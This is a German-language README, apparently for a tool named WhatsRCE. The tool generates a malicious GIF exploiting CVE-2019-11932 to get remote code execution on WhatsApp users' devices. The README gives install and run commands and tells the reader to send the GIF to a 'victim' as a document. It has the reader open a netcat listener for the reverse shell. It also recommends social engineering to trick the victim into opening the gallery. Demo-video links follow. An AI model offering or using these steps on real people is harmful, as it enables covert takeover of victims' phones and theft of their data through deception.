WhatsRCE
Dies ist ein automatisch generierter Payload für CVE-2019-11932 (WhatsApp Remote Code Execution)
- Automatische Installation von GCC (harmloser Befehl, du kannst sehen, dass dies Open-Source ist)
- Speichern als .GIF-Datei
Wie benutzt man?
sudo apt install git
git clone https://github.com/KeepWannabe/WhatsRCE
cd WhatsRCE && bash start.sh
Wie erhält man eine Shell?
- Du sendest die .GIF-Datei einfach an das Opfer ALS DOKUMENT, NICHT ALS BILD
- Und setzt nc / netcat auf den Port, den du bei den WhatsRCE-Tools festgelegt hast {nc -lnvp dein_port}
- Du kannst den Social-Engineering-Angriff nutzen, damit Opfer dazu verleitet werden, diesen Exploit auszulösen
- Sage dem Opfer, es soll die Galerie über WhatsApp öffnen, und schicke dem Opfer die Anweisung, beliebige Fotos zu senden (nicht nötig, es reicht, in die Galerie zu gehen, kein Problem). Danach erhältst du einige Sekunden später eine Shell-Verbindung vom Opfer
oder schau dir einfach das an
DEMO-VIDEO
https://drive.google.com/file/d/1T-v5XG8yQuiPojeMpOAG6UGr2TYpocIj/view
falls der obige Link nicht zugänglich ist
https://drive.google.com/open?id=1X9nBlf5oj5ef2UoYGOfusjxAiow8nKEK